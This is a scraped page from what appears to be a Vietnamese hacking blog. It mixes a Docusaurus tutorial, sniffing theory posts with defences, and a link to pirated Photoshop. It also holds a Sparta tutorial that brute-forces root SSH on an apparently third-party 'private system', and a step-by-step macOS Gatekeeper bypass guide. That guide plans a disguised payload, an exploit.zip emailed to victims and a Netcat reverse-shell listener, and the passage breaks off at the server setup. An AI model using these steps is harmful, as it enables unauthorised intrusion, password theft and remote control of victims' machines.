  • Chứng nhận ISTQB giúp bạn đủ điều kiện để nhận được công việc kiểm tra ở bất cứ nơi nào trên thế giới này, không như các chứng nhận khác chỉ được công nhận tại các quốc gia cụ thể.
  • Và điều làm cho chứng chỉ này thu hút và có giá trị nhiều lần so với các chứng chỉ khác, chính là chứng chỉ này không bao giờ hết hạn.

Nguồn : DTHSHARE

loading...

Chia sẻ Photoshop CS6 Portable không cần crack siêu nhẹ miễn phí

0

Hôm nay mình sẽ chia sẽ cho các bạn phần mềm photoshop cs6 portable việt hóa. Đối với những bạn không rành về tiếng Anh, thì trong quá trình làm quen với PTS rất khó thì hôm nay mình sẽ chia sẽ cho các bạn bản PTS việt hóa hoàn toàn, để thuận tiện cho việc thiết kế của bạn!

Tải Download Photoshop Việt hóa, một trải nghiệm thú vị để bạn có thể học photoshop tiếng việt, tất cả đều được việt hóa từ menu đến các tool, bạn nên thử. Một trong những phần mềm được các pro Việt Nam Việt hóa giúp cho người dùng dễ sử dụng hơn.

Các bạn chỉ cần tải về và chạy, không cần phải tự việt hóa hay crack lại phần mềm này

Link download Photoshop CS6 việt hóa : TẠI ĐÂY

loading...

Series Docusaurus – Quản lý tài liệu cho dự án một cách dễ dàng nhất – Phần 1

0

Hiện nay khi làm một dự án, điều mà các coder chúng ta thường hay quên mất hoặc bỏ qua khi hoàn thành một tính năng nào đó, đó chính là việc viết Unit Test và viết Documents cho tính năng đó. Việc viết tài liệu có thể dễ dàng với một số bạn, nhưng việc quản lý và lưu trữ tài liệu đồng bộ với từng dự án thì có thể các bạn sẽ gặp một số rắc rối. Trong series này mình sẽ giúp các bạn giải quyết việc viết documents hiệu quả cho project của bạn bằng công cụ có tên Docusaurus

1.Giới thiệu về Docusaurus

1. Docusaurus là gì?

Docusaurus đơn giản là một công cụ được thiết kế để giúp chúng ta quản lý cũng như tạo ra các Document mà không cần phải lo lắng về cơ sở hạ tầng quản lý cũng như chi tiết thiết kế.

Tất cả người dùng chỉ cần cung cấp các Document được viết bằng MarkDown, tuỳ chỉnh giao diện (Viết bằng React) theo ý thích của mình và sửa đổi cấu hình là xong, Docusaurus sẽ cung cấp cho chúng ta những file Document mặc định để dễ dàng viết hơn và xử lý những phần còn lại, rất đơn giản phải không

2. Tại sao chúng ta nên viết document cho dự án bằng Docusaurus ?

  • Giúp chúng ta tập trung vào việc viết tài liệu tốt hơn thay vì lo lắng về cơ sở hạ tầng của một trang web.
  • Giúp chúng ta tạo ra một Blog của riêng mình một cách dễ dàng và nhanh chóng.
  • Dễ dàng đẩy các bản cập nhật, các tính năng mới hay là sửa lỗi cho tất cả mọi người cùng một lúc.
  • Thêm nữa nó còn hỗ trợ tìm kiếm thông qua Algolia hay hỗ trợ dịch thuật qua Crowdin

3. Docusaurus ra đợi như thế nào ?

Vào quý 2 năm 2017, Docusaurus được phát triển bởi Facebook như là một “open source documentation”

Hiện đang có khoảng 7.6k stars trên Github, nó đang được coi là dự án phổ biến nhất hiện nay

Vậy chúng ta hãy cùng bắt đầu với Docusaurus. Trong bài viết này mình xin phép được chia sẻ hướng dẫn cài đặt cũng như chạy thử một website mẫu. Hãy cùng bắt tay vào làm nào J

2. Cài đặt Docusaurus

Docusaurus được Facebook phát triển nên nó được thiết kế ngay từ những bước đầu sao cho dễ dàng cài đặt và sử dụng nhất giúp trang web của bạn hoạt động một cách nhanh chóng. Để sử dụng được Docusaurus thì bạn cần cài thêm Node.js

Để cài đặt Node các bạn hãy vào đường link này nhé https://nodejs.org/en/download/

Docusaurus yêu cầu Node.js bản từ 8.0 trở lên. Sau khi chạy xong thì bạn có thể vào Terminal (Ubuntu/Linux) hoặc Powershell ( Windows ) chạy lệnh sau

npx docusaurus-init

Câu lệnh trên sẽ tự động tìm nạp gói docusaurus-init và thực thi nó, từ đó tạo ra các tệp dự án. Nếu các bạn muốn tìm hiểu thêm về npx thì hãy bấm vào đây (https://www.npmjs.com/package/npx).
Sau khi tải xong thư mục của bạn sẽ tự động có cấu trúc như sau

Tiếp theo chúng ta hãy cùng chạy thử một Website mẫu nhé. Để chạy thử, chúng ta hãy vào thư mục website và sử dụng script npm start để chạy

cd website
npm start

Lúc này Docusaurus sẽ chạy dự án tại port 3000 và mở  http://localhost:3000 trên trình duyệt mặc định.

Docusaurus hỗ trợ tải lại trực tiếp trang khi có sự thay đổi trên Documents hay Blog. Nhưng các bạn hãy lưu ý rằng những tệp cấu hình (vd: siteConfig.js) thì yêu cầu phải khởi động lại dự án mới có hiệu lực.

Chúng ta hãy cùng hiểu rõ hơn về cấu trúc của dự án

  • /docs
    • Là nơi chứa các tài liệu của chúng ta, các tài liệu được lưu dưới định dạng .md (vd: /docs/example.md)
  • /website/siteConfig.js
    • Là nơi để cấu hình dự án của chúng ta.
  • /website/pages/en/index.js
    • Là nơi chứa trang chủ.
  • /website/sidebars.json
    • Nơi chứa silde bar của dự án
  • /website/static
    • Nơi chứa assets file
  • /website/core/Footer.js
    • Là nơi chứa Footer của trang
  • /website/blog
    • Là nơi chứa những bài viết blog

Tóm váy lại Docusaurus là một trình tạo Document khá đẹp và dễ dàng đúng không các bạn :v. Để có thể nắm rõ hơn về cấu trúc của Document cũng như cách tổ chức Document, các bạn hãy đón xem series 2 về Cấu trúc Document và kết hợp Docusaurus với github pages các bạn nhé. Chúc các bạn thành công

Tác giả : Nguyễn Hữu Hòa

loading...

Series Sniffing – Phần 2 : Các hình thức tấn công sniffing phổ biến

0

Hello mọi người, sau bài viết phần 1 tại đây thì mình sẽ gửi tới các bạn phần 2 của series bài viết này <3 . Bạn nào chưa đọc phần 1 thì có thể theo dõi tại đây : https://anonymousvn.org/series-sniffing-phan-1-tong-quan-ve-sniffing.hav/

1.Lắng nghe thông tin qua Hub

Phương pháp tấn công

Sniffing trên mạng môi trường Hub là 1 giấc mơ đối với bất kỳ ai, bởi gói tin được gửi đi qua thiết bị Hub thì sẽ đi qua tất cả các cổng kết nối với Hub đó. Một khung gói tin khi chuyển từ máy A sang máy B thì đồng thời nó gửi đến tất cả các máy khác đang kết nối cùng Hub theo cơ chế loan tin (broadcast).

Mô hình lắng nghe thông tin qua Hub

Để phân tích lưu lượng đi qua 1 máy tính kết nối với 1 thiết bị Hub thì chỉ cần kết nối một packet sniffer tới 1 cổng còn trống trên Hub. Tuy nhiên, những giao dịch giữa các hệ thống mạng máy tính thường là những dữ liệu ở dạng nhị phân. Vì thế các chương trình nghe lén phải có chức năng giải mã dữ liệu ở dạng nhị phân để hiểu được chúng. Ngoài ra, kẻ tấn công sẽ chuyển card mạng sang chế độ Promiscuous. Chế độ Promiscuous cho phép card mạng nhìn thấy tất cả các gói tin đi qua hệ thống dây mạng. Khi card mạng được đặt dưới chế độ này, nó có thể nhận tất cả các gói tin mà không bị ràng buộc kiểm tra địa chỉ đích đến. Từ đó, kẻ tấn công có thể thấy được tất cả truyền thông đến và đi từ máy tính đó, cũng như truyền thông giữa các thiết bị khác kết nối với thiết bị Hub. Tuy nhiên, ngày nay mạng Hub không còn được ưa chuộng bởi vì chỉ có 1 thiết bị duy nhất có thể truyền thông tại một thời điểm, 1 thiết bị kết nối qua 1 Hub phải cạnh tranh băng thông với các thiết bị khác cũng đang cố gắng truyền thông qua thiết bị Hub đó. Khi hai hay nhiều thiết bị truyền thông ngay tại cùng một thời điểm, sẽ dễ xảy ra xung đột. Vì thế nên dù Hub có tiện lợi, dễ sử dụng nhưng ngày nay, hầu hết các mạng đều sử dụng Switch thay cho Hub.

Các biện pháp phòng chống

Phương pháp lắng nghe thông tin qua Hub khó phát hiện và phòng chống, vì kẻ tấn công chỉ tiến hành lắng nghe trên đường truyền và bắt giữ lại những gói tin mà không có sự tác động đáng kể nào vào hệ thống. Vì thế một trong những cách đơn giản nhất là làm cách nào để các gói tin không còn broadcast nữa, bằng cách sử dụng Switch thay cho Hub. Ngoài ra có thể dùng phương pháp “lấy độc trị độc” là sử dụng chính các công cụ nghe lén để phát hiện mình có bị nghe lén hay không. Các công cụ này ngoài việc thực hiện tác vụ nghe lén, còn có khả năng dò tìm trên mạng nội bộ có máy nào đang nghe lén hay không.

Tấn công MAC 

Khái niệm địa chỉ MAC

Địa chỉ MAC (Media Access Control) là kiểu địa chỉ vật lí, đặc trưng cho một thiết bị hoặc một nhóm các thiết bị trong LAN. Địa chỉ này được dùng để nhận diện các thiết bị giúp cho các gói tin lớp 2 có thể đến đúng đích.

Địa chỉ MAC gồm một bộ sáu cặp hai ký tự, cách nhau bằng dấu hai chấm. Ví dụ 00:1B:44:11:3A:B7 là một địa chỉ MAC.

Phương pháp tấn công

Tấn công MAC là kỹ thuật khá phổ biến trong mạng LAN. Mục đích của kỹ thuật này là làm ngập lụt switch với một số lượng lớn yêu cầu. Thoạt nhìn thì thấy đây chỉ là mục đích phá hoại nhưng đối tượng tấn công có thể đi xa hơn khi tận dụng để nghe lén các gói tin của người khác.

Kẻ tấn công phải nằm trong chính mạng LAN đó và sử dụng một ứng dụng phần mềm để tạo thật nhiều frame với địa chỉ MAC giả mạo (MAC spoofing) rồi gửi đến switch. Khi nhận được frame này, switch không phân biệt được đâu là giả đâu là thật và sẽ xem nó như một frame bình thường. Lúc này, switch sẽ cập nhật các địa chỉ MAC mới vào bảng CAM.

Bảng CAM (Content Addressable Memory), cũng có thể gọi là bảng MAC, là nơi lưu trữ các địa chỉ MAC của các port và các tham số VLAN trong switch. Nhờ vào bảng CAM, switch có thể biết được một thiết bị có địa chỉ MAC X đang nằm ở port vật lý nào để còn đẩy frame trả lời về port đó. Kẻ tấn công sẽ đầu độc switch liên tục toàn các địa chỉ MAC giả mạo. Bảng CAM của switch thì có kích thước giới hạn, nên đến một thời điểm nào đó bảng CAM sẽ bị đầy.

Đầu độc switch bằng địa chỉ MAC giả khiến bảng CAM trong sswitch bị đầy.

Khi máy A gửi gói tin đến máy B, nó sẽ tìm trong bảng địa chỉ MAC của nó, coi thử có địa chỉ MAC của máy B hay không, nếu không có máy A sẽ gửi gói tin ARP request đến switch để hỏi địa chỉ MAC của máy B. Máy B lúc này nhận được gói tin sẽ gửi phản hồi lại cho máy A sau đó các gói tin được lưu chuyển từ A đến B mà không chuyển sang các máy khác. Tuy nhiên, lúc này bảng CAM đã bị đầy tràn, các lưu lượng ARP request sẽ làm ngập lụt mỗi cổng của switch. Switch đã bị lụt với các gói tin của các địa chỉ MAC khác nhau và sẽ broadcast lưu lượng mà ko cần thông qua bảng CAM nữa. Đến lúc này thì switch hoạt động không khác gì hub. Kẻ tấn công sẽ sử dụng 1 công cụ Packet Sniffer để thâu tóm các dữ liệu mong muốn.

Switch hoạt động như một hub và lắng nghe được thông tin trong mạng.

Các biện pháp phòng chống

Nguyên lí chung của các phương pháp phòng chống là không để các gói tin có địa chỉ MAC lạ đi qua switch. Phương pháp phòng chống hiệu quả nhất là cấu hình port security trên switch. Đây là một đặc trưng cấu hình cho phép điều khiển việc truy cập vào cổng switch thông qua địa chỉ MAC của thiết bị gắn vào. Khi switch nhận được một gói tin chuyển đến, nó sẽ kiểm tra địa chỉ MAC nguồn của gói tin với danh sách các địa chỉ đã được cấu hình trước đó. Nếu hai địa chỉ này khác nhau thì tuỳ theo sự cấu hình của người quản trị mà switch sẽ xử lí gói tin đến với các mức độ khác nhau.

Các lệnh cấu hình port security:

  • Switch(config-if)# switchport mode access
  • Switch(config-if)# switchport port-security: Cho phép cổng được hoạt động trong chế độ port-security.
  • Mặc định thì cổng chỉ cho phép một địa chỉ MAC (một thiết bị) được gán vào và số địa chỉ có thể nằm trong khoảng từ 1 đến 1024.
  • Switch(config-if)#sw port-security violation shutdown: Nếu vi phạm sẽ tắt cổng, kẻ tấn công sẽ không thể làm tràn bảng CAM

Tác giả : Hoàng Sơn Hà

loading...

Series Sniffing – Phần 1 : Tổng quan về sniffing

2

Chào các bạn, sắp tới ngoài những bài viết cơ bản,bên mình sẽ cố gắng tập trung vào những series bài viết về các kiến thức cơ bản trong hacking để mọi người có thể nắm dược và hiểu được từ những điều đơn giản nhất. Chính vì vậy, bọn mình đã chọn Sniffing làm chủ đề đầu tiên để viết. Toàn bộ series bài viết này được một bạn đang học về ATTT tại KMA chia sẻ, mình sẽ để link Facebook của bạn này dưới cuối bài viết để mọi người tiện theo dõi. 

CHƯƠNG I: TỔNG QUAN VỀ SNIFFING

  1. Định nghĩa Sniffing

  1. Khái niệm Sniffing

Sniffing là một chương trình lắng nghe trên hệ thống mạng để truyền dữ liệu. Sniffing cho phép các cá nhân nắm bắt dữ liệu khi nó truyền qua mạng. Kỹ thuật này được sử dụng bởi các chuyên gia mạng để chuẩn đoán các sự cố mạng và bởi những users có ý định xấu để thu thập dữ liệu không được mã hóa, như password và username. Nếu thông tin này được ghi lại trong quá trình người dùng có thể truy cập vào hệ thống hoặc mạng.

Khởi đầu Sniffer là tên một sản phầm của Network Associates có tên là Sniffier Analyzer.

Những dữ liệu mà Sniffing chụp được là những dữ liệu ở dạng nhị phân (Binary). Bởi vậy để nghe lén và hiểu được những dữ liệu ở dạng nhị phân này, các chương trình Sniffing phải có tính năng được biết như là sự phân tích các giao thức (Protocol Analysis), cũng như tính năng giải mã (Decode) các dữ liệu ở dạng nhị phân sang dạng khác để hiểu được chúng.

Đối tượng Sniffing là:

  • Password (từ Email, Web, SMB, FTP, SQL hoặc Telnet)

  • Các thông tin về thẻ tín dụng

  • Văn bản của Email

  • Các tập tin đang di động trên mạng (tập tin Email, FTP hoặc SMB)

  1. Mục đích sử dụng

Sniffing thường được sử dụng vào 2 mục đích khác biệt nhau.

+ Tích cực:

  • Chuyển đổi dữ liệu trên đường truyền để quản trị viên có thể đọc và hiểu ý nghĩa của những dữ liệu đó.

  • Bằng cách nhìn vào lưu lượng của hệ thống cho phép quản trị viên có thể phân tích lỗi đang mắc phải trên hệ thống lưu lượng của mạng.

  • Một số Sniffing tân tiến có thêm tính năng tự động phát hiện và cảnh báo các cuộc tấn công đang được thực hiện vào hệ thống mạng mà nó đang hoạt động. (Intrusion Detecte Service)

  • Ghi lại thông tin về các gói dữ liệu, các phiên truyền…Giúp các quản trị viên có thể xem lại thông tin về các gói dữ liệu, các phiên truyền sau sự cố…Phục vụ cho công việc phân tích, khắc phục các sự cố trên hệ thống mạng.

+ Tiêu cực:

  • Nghe lén thông tin trên mạng để lấy các thông tin quan trọng.

  1. Các giao thức có thể sử dụng Sniffing

  • Telnet và Rlogin: ghi lại các thông tin như password, usernames

  • HTTP (HyperText Transfer Protocol): Các dữ liệu gửi đi không mã hóa

  • SMTP, NNTP, POP, FTP, IMAP: Password và dữ liệu gửi đi không mã hóa.

  1. Phương thức hoạt động Sniffing

Công nghệ Ethernet được xây dựng trên một nguyên lý chia sẻ. Theo một khái niệm này thì tất cả các máy tính trên hệ thống mạng cục bộ đều có thể chia sẻ đường truyền của hệ thống mạng đó. Hiểu một cách khác tất cả các máy tính đều có khả năng nhìn thấy lưu lượng dữ liệu được truyền của hệ thống mạng đó. Như vậy phần cứng Ethernet được xây dựng với tính năng lọc và bỏ qua tất cả những dữ liệu không thuộc đường truyền chung với nó.

Nó thực hiện được điều này trên nguyên lý bỏ qua tất cả những Frame có địa chỉ MAC không hợp lệ đối với nó. Khi Sniffing được tắt tính năng lọc này và sử dụng chế độ hỗn tạp (Promiscuous Mode). Nó có thể nhìn thấy tất cả lưu lượng thông tin từ máy B đến máy C, hay bất cứ lưu lượng thông tin giữa bất kỳ máy nào trên hệ thống mạng. Miễn là chúng cùng nằm trên một hệ thống mạng.

Trong môi trường Hub: Một khung gói tin khi chuyển từ máy A sang máy B thì đồng thời nó gửi đến tất cả các máy khác đang kết nối cùng Hub theo cơ chế loan tin (broadcast). Các máy khác nhận được gói tin này sẽ tiến hành so sánh yêu cầu về địa chỉ MAC của frame gói tin với địa chỉ đích. Nếu trùng lập thì sẽ nhận, còn không thì cho qua. Do gói tin từ A được gửi đến B nên khi so sánh thì chỉ có B mới giống địa chỉ đích đến nên chỉ có B mới thực hiện tiếp nhận.

Dựa vào nguyên tắc đó, máy được cài đặt chương trình nghe trộm sẽ “tự nhận” bất cứ gói tin được lưu chuyển trong mạng qua Hub, kể cả khi đích đến gói tin có đích đến không phải là nó, do sniffer chuyển card mạng của máy sang chế độ hỗn tạp (promiscuous mode). Promiscuous mode là chế độ đặc biệt. Khi card mạng được đặt dưới chế độ này, nó có thể nhận tất cả các gói tin mà không bị ràng buộc kiểm tra địa chỉ đích đến.

Trong môi trường Switch: Khác với Hub, Switch chỉ chuyển tải các gói tin đến những địa chỉ cổng xác định trong bảng chuyển mạch nên nghe trộm kiểu “tự nhận” như ở Hub không thực hiện được. Tuy nhiên, kẻ tấn công có thể dùng các cơ chế khác để tấn công trong môi trường Switch như ARP spoofing, MAC spoofing, MAC duplicating, DNS spoofing, v.v…

  1. Phân loại Sniffing:

    1. Active

Chủ yếu hoạt động trong môi trường có các thiết bị chuyển mạch gói, phổ biến hiện nay là các dạng mạch sử dụng Switch. Kẻ tấn công thực hiện sniffing dựa trên cơ chế ARP và RARP (2 cơ chế chuyển đổi từ IP sang MAC và từ MAC sang IP) bằng cách phát đi các gói tin đầu độc, mà cụ thể ở đây là phát đi các gói thông báo cho máy gửi gói tin là “tôi là người nhận” mặc không phải là “người nhận”. Ngoài ra, các sniffer còn có thể dùng phương pháp giả địa chỉ MAC, thay đổi MAC của bản thân thành MAC của một máy hợp lệ và qua được chức năng lọc MAC của thiết bị, qua đó ép dòng dữ liệu đi qua card mạng của mình. Tuy nhiên, do gói tin phải gửi đi nên sẽ chiếm băng thông. Nếu thực hiện sniffing quá nhiều máy trong mạng thì lượng gói tin gửi đi sẽ rất lớn (do liên tục gửi đi các gói tin giả mạo) có thể dẫn đến nghẽn mạng.

    1. Passive :

Chủ yếu hoạt động trong môi trường không có các thiết bị chuyển mạch gói, phổ biến hiện nay là các dạng mạng sử dụng Hub. Do không có các thiết bị chuyển mạch gói nên các gói tin được broadcast đi trong mạng. Chính vì vậy, việc thực hiện sniffing là khá đơn giản. Kẻ tấn công không cần gửi ra gói tin giả mạo nào, chỉ cần bắt các gói tin từ Port về (dù host nhận gói tin không phải là nơi đến của gói tin đó). Hình thức sniffing này rất khó phát hiện do các máy tự broadcast các gói tin. Ngày nay hình thức này thường ít được sử dụng do Hub không còn được ưa chuộng nhiều, thay vào đó là Switch.

  1. Các hình thức tấn công

Sniffing là hình thức nghe lén thông tin trên mạng nhằm khai thác hiệu quả hơn tài nguyên mạng, theo dõi thông tin bất hợp pháp. Tuy nhiên, sau này các hacker dùng sniffing để lấy các thông tin nhạy cảm, do đó cũng có thể coi đó là 1 hình thức hack. Có khá nhiều các phương pháp để thực hiện sniffing, dù là tấn công chủ động hay bị động. Bài báo cáo sẽ nói cụ thể về 6 phương pháp tấn công sniffing:

  • Lắng nghe thông tin qua Hub

  • Tấn công MAC

  • Tấn công DHCP

  • Chặn bắt thông tin dùng ARP- Poisoning

  • Chặn bắt thông tin dùng DNS- Spoofing

  • VLAN Hopping

Qua phần 1 của bài viết này, hi vọng mọi người đã có cái nhìn tổng quan nhất về phương thức tấn công Sniffing, trong các phần sau của bài viết mình sẽ trình bày rõ hơn để mọi người đều có cái nhìn sâu hơn về Sniffing.

Như đã nói ở trên, mình để lại link Facebook của tác giả series này, mọi người đều có thể kết bạn làm quen với nhau : 

Tác giả : Hoàng Sơn Hà

Chúc các bạn học tốt <3

loading...

Sử dụng công cụ Sparta để tìm kiếm và tấn công services trên webapp và networks

0

Tự động scan port, brute-force đường dẫn và một số công cụ khác trên Kali Linux có lẽ khá là khó với những người bắt đầu tìm hiểu về hack, chính vì vậy, công cụ Sparta ra đời với mục đích đơn giản hóa các tác vụ phức tạp.

Sparta là một công cụ có giao diện đồ họa được viết trên nền ngôn ngữ Python. Sparta giúp chúng ta tự động hóa được các công việc như thu thập thông tin, quét tự động và kiểm tra lỗ hổng bảo mật tự động. Không lạ là Sparta cũng sử dụng các module của Nikto, WhatWeb, Nmap, Telnet, Netcat để hoạt động.

Trước khi bắt đầu vào tìm hiểu thì ta sẽ cài đặt Sparta

1. Cài đặt công cụ hack Sparta

Sparta thường được cài đặt sẵn trên hầu hết các bản phân phối của Kali Linux, tuy nhiên với bản Kali Linux Light thì bạn cần cài nó thủ công. Để cài đặt thì bạn gõ lệnh sau :

apt-get update &amp;&amp; apt-get install sparta python-requests
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  avahi-daemon cutycapt finger firebird3.0-common firebird3.0-common-doc geoclue-2.0 hydra iio-sensor-proxy javascript-common ldap-utils libapr1 libaprutil1 libaudio2 libavahi-core7 libavahi-glib1 libbrotli1
  libdaemon0 libdouble-conversion1 libfbclient2 libhyphen0 libjs-jquery libmng1 libnss-mdns libpcre2-16-0 libpq5 libqt4-dbus libqt4-declarative libqt4-designer libqt4-help libqt4-network libqt4-script
  libqt4-scripttools libqt4-sql libqt4-sql-mysql libqt4-svg libqt4-test libqt4-xml libqt4-xmlpatterns libqt5core5a libqt5dbus5 libqt5gui5 libqt5network5 libqt5positioning5 libqt5printsupport5 libqt5qml5
  libqt5quick5 libqt5sensors5 libqt5svg5 libqt5webchannel5 libqt5webkit5 libqt5widgets5 libqtassistantclient4 libqtcore4 libqtdbus4 libqtgui4 libserf-1-1 libssh-4 libsvn1 libtommath1 libutf8proc2 libwoff1
  libxcb-icccm4 libxcb-image0 libxcb-keysyms1 libxcb-randr0 libxcb-render-util0 libxcb-xinerama0 libxcb-xkb1 libxkbcommon-x11-0 libxslt1.1 nikto python-asn1crypto python-blinker python-cffi-backend python-click
  python-colorama python-crypto python-cryptography python-elixir python-enum34 python-flask python-impacket python-ipaddress python-itsdangerous python-jinja2 python-ldap3 python-markupsafe python-openssl
  python-pkg-resources python-pyasn1 python-pycryptodome python-pyinotify python-qt4 python-simplejson python-sip python-six python-sqlalchemy python-sqlalchemy-ext python-werkzeug qdbus qt-at-spi
  qt5-gtk-platformtheme qtchooser qtcore4-l10n qttranslations5-l10n rwho rwhod sparta xsltproc
0 upgraded, 109 newly installed, 0 to remove and 0 not upgraded.
Need to get 57.8 MB of archives.
After this operation, 227 MB of additional disk space will be used.
Do you want to continue? [Y/n]

Sau khi cài đặt xong, bạn có thể khởi động Sparta bằng cách gõ “sparta” vào terminal.

sparta

[+] Creating temporary files..
[+] Wordlist was created/opened: /tmp/sparta-9AE08J-tool-output/sparta-usernames.txt
[+] Wordlist was created/opened: /tmp/sparta-9AE08J-tool-output/sparta-passwords.txt
[+] Loading settings file..

Sau khi loading file xong thì Sparta sẽ come to your computer :)))) Giao diện của Sparta về cơ bản sẽ như sau :

2. Tiến hành quét Networks, Webapp

Sparta có một chức năng khá hay đó là nó có thể quét theo dải ip của một mạng, hoặc có thể quét theo 1 domain, hay chỉ 1 ip. Bạn chỉ cần bấm vào dòng “Click here to add host(s) to scope” ở dưới tab Scan

Ở đây bạn có thể điền vào domain, ip hoặc dải ip tùy vào mục đích sử dụng của bạn. Sau khi xong thì bạn bấm vào “Add to Scope”.

Sau khi bạn click thì Nmap sẽ được chạy đầu tiên để quét trên các port phổ biến như 80, 443. Sau khi xong thì Nmap và Nikto sẽ cùng chạy quét trên các port ít phổ biến hơn.

3. Phân tích kết quả

Sau khi đã có kết quả quét, bạn sẽ tìm được khá nhiều điểm thú vị ở phần kết quả của Sparta. Chúng ta sẽ cùng phân tích thử một kết quả.

Đáng chú ý nhất trong quá trình quét ứng dụng web, dịch vụ SSH nằm trên cổng 22222. Quản trị viên hệ thống có thể đã thay đổi cổng SSH mặc định từ 22 thành 22222. Có thể admin của website này nghĩ rằng việc đổi port như vậy sẽ an toàn hơn, tuy nhiên, như chúng ta có thể thấy, điều này không đúng – Sparta vẫn phát hiện dịch vụ SSH. Ngoài ra Sparta còn hỗ trợ một số công cụ khác trong quá trình scan như:

  • Portscan
  • Mark as checked
  • Open with telnet
  • Open with ssh client (as root)
  • Open with netcat
  • Send to Brute
  • Open in browser
  • Take screenshot
  • Run whatweb
  • Run nmap (scripts) on port
  • Run nikto
  • Launch webslayer
  • Launch dirbuster
  • Grab banner

Bạn cũng có thể target tới nhiều scope cùng lúc bằng cách bấm vào File và chọn “”Add host(s) to scope.”

4. Quét một dịch vụ SSH

SSH là một giao thức quản trị từ xa cực kỳ phổ biến với các máy chủ hiện nay. Mình sẽ click vào dịch vụ SSH vừa được quét ở trên, trong trường hợp này thì SSH nằm ở cổng 22222 và chọn “Open with SSH client”, Sparta sẽ mở một terminal lên và cố gắng đăng nhập.

The authenticity of host '[███.███.███.███]:22222 ([███.███.███.███]:22222)' can't be established.
ECDSA key fingerprint is SHA256:f94dIlgg2kDtCK4ahtN5/iAZxY9D6v+FtNTLK03uTr4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[███.███.███.███]:22222' (ECDSA) to the list of known hosts.

This is a private system maintained by ██████████ Corporation.
All connections are logged and monitored. Issues accessing this server should be reported to ████████@████████████.org.

root@███████████'s password:

Tiếp tục bấm chuột phải vào Service SSH vừa quét được ở trên và chọn “Send to brute”. Sau đó click vào tab Brute trên cửa sổ của Sparta

Ở tab này, Sparta sẽ tiến hành brute-force mật khẩu đăng nhập SSH. Điều bạn cần làm là chọn username và wordlist.

Tham khảo thêm Hướng dẫn hack pass Wifi bằng từ điển

Trên Linux, có một số bản wordlist sẵn ở đường dẫn /usr/share/wordlists/ 

Bạn cũng có thể tham khảo một số wordlist tại :

Khi bạn đã cấu hình wordlist và username xong thì chỉ cần bấm “RUN” và ngồi đợi. Ở bước này thì Sparta sử dụng module brute-force của Hydra

Nếu như mật khẩu được tìm thấy trong wordlist thì sẽ hiện kết quả như sau

Bài viết này khá dài nên tạm thời mình sẽ dùng ở đây, phần 2 sẽ được mình viết và đăng nốt trong tuần này.

Chúc các bạn thành công <3

loading...

Hướng dẫn bypass Gatekeeper và khai thác lỗ hổng macOS trên phiên bản 10.14.5 và thấp hơn

1

Mấy ngày nay trên mạng có rộ lên về một cách hack vào macOS bằng file zip. Qua quá trình tìm hiểu thì trong bài viết này mình sẽ hướng dẫn các bạn từng bước để có thể thực hiện khai thác được lỗ hổng này.

Phần mềm bảo mật Gatekeeper của Apple cho macOS (Mac OS X) được phát hiện chứa một lỗ hổng bảo mật trên macOS phiên bản 10.14.5. Hacker ở bất cứ nơi nào trên thế giới có thể khai thác MacBook và các máy tính Mac khác bằng cách chia sẻ một tệp ZIP với nạn nhân.

Lỗ hổng này được phát hiện bởi Filippo Cavallarin, một nhà nghiên cứu bảo mật và hiện đang là CEO của We Are Segment, một công ty an ninh mạng của Ý. Trong bài đăng trên blog của mình, Filippo cũng có hướng dẫn cách khai thác lỗi này. Mình sẽ để video của Filippo ở cuối bài viết để mọi người tiện theo dõi.

Tại thời điểm mình đang ngồi viết bài này thì vẫn chưa thấy có bản vá cho lỗ hổng. Nó ảnh hưởng đến macOS Mojave 10.14.5 và tất cả các phiên bản trước theo Filippo, vì vậy High Sierra, Sierra, El Capitan, Yosemite, v.v … có khả năng cao là cũng sẽ tồn tại lỗi này.

Okay, bây giờ mình sẽ hướng dẫn chi tiết từng bước một để bạn có thể tự tay khai thác được lỗi bảo mật này, tuy nhiên trước hết chúng ta cần nắm rõ một số khái niệm sau :

  • Gatekeeper: Đây là một tính năng bảo mật của macOS được thiết kế để đảm bảo rằng chỉ các ứng dụng đáng tin cậy được phép chạy trên máy tính Mac. Thông thường, khi một ứng dụng được tải xuống thông qua trình duyệt web, Gatekeeper sẽ xác nhận phần mềm từ nhà phát triển đã được xác minh hoặc ngay lập tức đánh dấu nó là “nguy hiểm”. Tất nhiên là lỗi bảo mật sắp được nói tới đây hiện không bị GateKeeper chặn.
  • Symbolic Links : Symbolic Link được dịch sang tiếng Việt là liên kết tượng trưng. Liên kết tượng trưng là đối tượng hệ thống tập tin trỏ đến đối tượng hệ thống tập tin khác, được xem như là đường tắt nâng cao (advanced shorcut). Symlink có thể trỏ tới một file hoặc một đường dẫn ở máy remote. Trong macOS, các liên kết tượng trưng đến các máy chủ từ xa sẽ được Gatekeeper tự động tin cậy.
  • Network File System : Một giao thức hệ thống tệp phân tán tương tự SMB. Symlink sẽ thực hiện một kết nối đến (NFS) trên máy của hacker đang chứa file payload.app để khai thác mà hacker đã tạo trước.

Trong bài viết này mình sẽ sử dụng một file txt giả mạo để test. Tuy nhiên thì file payload có thể hóa thân thành bất cứ file nào như PDF hay MP4,… Việc sau đó là đổi icon và đuôi của tệp.

Nhìn vào đây rất khó có thể biết được file nào là file độc hại

Một NSF share server sẽ được cài đặt trên VPS chạy Debian 9. Hai file được tạo là : payload.app và exploit.zip.

  • File payload.app là file hacker dự định sẽ cài lên máy của victim, file này sẽ chạy một số command và crontab
  • File exploit.zip cũng là file dự định tải xuống máy của victim, file này chứa symlink dùng để bypass Gatekeeper.

Server sẽ được cấu hình Netcat để nhận các reverse shell. Tệp exploit.zip sẽ được chia sẻ với victim qua email.

Bước 1: Cài đặt NFS trên VPS Debian 9

Okay, chúng ta sẽ cần SSH vào vps. Thật ra bạn cũng có thể setup trên local, tuy nhiên với mục đích là có thể hack Macbook ở bất cứ nơi nào nên mình sẽ cài đặt nó lên 1 con VPS. Tiến hành gõ lệnh sau để cài đặt các package cần thiết:

sudo apt-get install nfs-common nfs-kernel-server
Hit:1 http://security.debian.org/debian-security stretch/updates InRelease
Ign:2 http://http.us.debian.org/debian stretch InRelease
Hit:3 http://http.us.debian.org/debian stretch-updates InRelease
Hit:4 http://http.us.debian.org/debian stretch Release
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  keyutils libevent-2.0-5 libnfsidmap2 libtirpc1 rpcbind
Suggested packages:
  open-iscsi watchdog
The following NEW packages will be installed:
